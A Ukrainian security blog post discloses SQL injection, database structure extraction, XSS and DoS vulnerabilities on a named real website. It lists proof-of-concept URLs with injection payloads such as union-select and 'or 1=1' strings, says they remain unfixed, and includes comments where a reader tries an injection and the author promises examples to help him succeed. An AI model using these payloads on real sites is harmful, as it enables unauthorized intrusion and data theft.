Уразливості на www.cctvua.com
19:41 10.03.200927.06.2008
У листопаді, 02.11.2007, я знайшов SQL DB Structure Extraction, SQL Injection, Cross-Site Scripting та Denial of Service уразливості на секюріті проекті http://www.cctvua.com. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
10.03.2009
SQL DB Structure Extraction
http://www.cctvua.com/?p=202989;c=1′;s=28
SQL Injection:
http://www.cctvua.com/?p=202989;c=1;s=1%20and%20version()%3E4
http://www.cctvua.com/?p=202989;c=1%20and%20version()%3E4;s=28
http://www.cctvua.com/?p=-1%20union%20select%20version(),1,1/*;c=1;s=28
Дві blind SQL Injection та одна звичайна SQL ін’єкція.
XSS (через SQL Injection):
DoS (через SQL Injection):
http://www.cctvua.com/?p=202989;c=1;s=-1%20or%201=1/*
http://www.cctvua.com/?p=202989%20or%201=1/*;c=1;s=28
Дані уразливості досі не виправлені.
Понеділок, 00:50 30.06.2008
Я так зрозумів, там запит в запиті?
http://www.cctvua.com/?p=203255;c=1;s=-21+union+select+1–
Якщо Ви це мали на увазі
Я так і не дійшов до мети
(с) n3m0
Понеділок, 23:53 09.03.2009
n3m0
Уразливостей на тому сайті чимало (в движку, що вони використовують). В тому числі й декілька SQL Injection. Є як blind SQLi, так і звичайна SQLi, що дозволяє робити запит в запиті. Про що я найближчим часом напишу деталі.
В параметрі s наявна blind SQLi, де не можна використати вкладений запит, тому ти й не дійшов до мети (там потрібен інший підхід). Не переживай, незабаром я оприлюдню деталі і з моїми прикладами ти зможеш дійти до мети .